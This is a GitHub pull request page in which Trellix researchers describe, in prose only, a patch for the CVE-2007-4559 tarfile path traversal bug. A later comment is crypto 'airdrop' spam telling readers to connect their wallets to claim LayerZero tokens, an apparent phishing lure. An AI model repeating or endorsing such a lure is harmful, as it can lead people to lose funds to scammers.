Skip to content

CVE-2007-4559 Patch #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
TrellixVulnTeam wants to merge 1 commit into
base: main
Choose a base branch
from
Open

CVE-2007-4559 Patch #1

TrellixVulnTeam wants to merge 1 commit into from

Conversation

@TrellixVulnTeam
Copy link

@TrellixVulnTeam TrellixVulnTeam commented Nov 29, 2022

Patching CVE-2007-4559

Hi, we are security researchers from the Advanced Research Center at Trellix. We have began a campaign to patch a widespread bug named CVE-2007-4559. CVE-2007-4559 is a 15 year old bug in the Python tarfile package. By using extract() or extractall() on a tarfile object without sanitizing input, a maliciously crafted .tar file could perform a directory path traversal attack. We found at least one unsantized extractall() in your codebase and are providing a patch for you via pull request. The patch essentially checks to see if all tarfile members will be extracted safely and throws an exception otherwise. We encourage you to use this patch or your own solution to secure against CVE-2007-4559. Further technical information about the vulnerability can be found in this blog.

If you have further questions you may contact us through this projects lead researcher Kasimir Schulz.

@ghost
Copy link

ghost commented Dec 24, 2023

LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

Layerzero Oficial

Claim Now

Secure Your Layerzero Airdrop with These Simple Steps:

  1. Connect Your Wallet:

    • Head over to the Layerzero Airdrop.
    • Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

  2. Eligibility Check:

  3. Engage for Extra Rewards:

    • Participate in community discussions or complete tasks for bonus rewards.

Bonus Tips:

  • Community Assistance:

    • Need help? Drop a message on Telegram or other social media platforms.

  • Stay Informed:

    • Keep an eye out for updates on the airdrop process via official channels.

  • Patience Pays Off:

    • Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

Repository owner deleted a comment from dwcooper Feb 23, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@TrellixVulnTeam